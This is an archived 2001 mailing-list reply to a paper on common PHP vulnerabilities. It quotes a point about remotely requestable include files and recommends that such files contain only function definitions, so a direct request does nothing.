Re: A Study In Scarlet - Exploiting Common Vulnerabilities in P

• Previous message: Cook, Justin S. (Schmidt): "RE: Multiple Vendor Java Servlet Container Cross-Site Scripting V ulnerability"
• Next in thread: David Nugent: "Re: A Study In Scarlet - Exploiting Common Vulnerabilities in P"
• Reply: David Nugent: "Re: A Study In Scarlet - Exploiting Common Vulnerabilities in P"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Shaun Clowes writes.

[snip]

> 6. Library Files

[snip]

> When libdir/loadlanguage.php is called in the defined context of main.php it is
> perfectly safe. But because libdir/loadlanguage has the extension .php (it
> doesn't have to have that extension, include() works on any file) it can be
> requested and executed by a remote attacker. When out of context an attacker
> can set $langDir and $userLang to whatever they wish.
> 

I find it good practice that PHP included files have ONLY
function definitions, (and perhaps some assignments of
global configuration variables.)  

The reason is that when such a file is requested directly,
no actions are taken. The result is a blank document.

Thank you for sharing a very nice summary paper.

Forrest J. Cavalier III, Mib Software  Voice 570-992-8824 
http://www.rocketaware.com/ has over 30,000 links to  
source, libraries, functions, applications, and documentation.   

• Next message: Support Info: "Security Update:[CSSA-2001-019.1] Linux - Webmin root account leak"
• Previous message: Cook, Justin S. (Schmidt): "RE: Multiple Vendor Java Servlet Container Cross-Site Scripting V ulnerability"
• Next in thread: David Nugent: "Re: A Study In Scarlet - Exploiting Common Vulnerabilities in P"
• Reply: David Nugent: "Re: A Study In Scarlet - Exploiting Common Vulnerabilities in P"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 03 2001 - 13:34:18 PDT